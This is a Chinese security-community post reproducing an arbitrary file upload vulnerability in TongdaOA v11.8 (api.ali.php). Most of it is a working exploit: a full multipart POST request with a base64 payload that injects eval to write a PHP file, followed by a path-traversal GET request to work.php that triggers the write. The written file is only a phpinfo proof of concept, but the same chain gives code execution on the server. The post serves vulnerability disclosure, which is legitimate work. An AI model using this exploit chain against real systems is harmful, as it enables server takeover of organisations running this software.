奇安信攻防社区-TongdaOA v11.8 api.ali.php 任意文件上传漏洞

TongdaOA v11.8 api.ali.php 任意文件上传漏洞

# TongdaOA v11.8 api.ali.php 任意文件上传漏洞 ## 漏洞描述 TongdaOA v11.8 api.ali.php 存在任意文件上传漏洞，攻击者通过漏可以上传恶意文件控制服务器 ## 漏洞影响 TongdaOA v...

TongdaOA v11.8 api.ali.php 任意文件上传漏洞
===================================

漏洞描述
----

TongdaOA v11.8 api.ali.php 存在任意文件上传漏洞，攻击者通过漏可以上传恶意文件控制服务器

漏洞影响
----

TongdaOA v11.8

漏洞复现
----

登陆页面

![img](https://shs3.b.qianxin.com/butian_public/f992692c9a4d2a6cad3105af46c6a14cd8c495de2bb03.jpg)

像 api.ali.php 发送请求包

```python
POST /mobile/api/api.ali.php HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 422
Content-Type: multipart/form-data; boundary=502f67681799b07e4de6b503655f5cae
Accept-Encoding: gzip

--502f67681799b07e4de6b503655f5cae
Content-Disposition: form-data; name="file"; filename="fb6790f4.json"
Content-Type: application/octet-stream

{"modular":"AllVariable","a":"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==","dataAnalysis":"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\"}"}
--502f67681799b07e4de6b503655f5cae--
```

参数a base解码

ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file\_put\_contents('../../fb6790f4.php','&lt;?php phpinfo();?&gt;');

![img](https://shs3.b.qianxin.com/butian_public/f2503569752a1737a932e859ddcfe9df487a70a692871.jpg)

再发送GET请求写入文件

```python
/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.fb6790f4
```

![img](https://shs3.b.qianxin.com/butian_public/f8672031c1c2166ba7090858f987889cc675d318a60b9.jpg)

其中请求中对 2109 为 年月,路径为 `/fb6790f4.php,`

![img](https://shs3.b.qianxin.com/butian_public/f5236712ede3eed6a60006ed850508f43491511c5896f.jpg)

发表于 2024-07-12 18:44:35
阅读 ( 1070 )
分类：OA产品

TongdaOA v11.8 api.ali.php 任意文件上传漏洞

0 条评论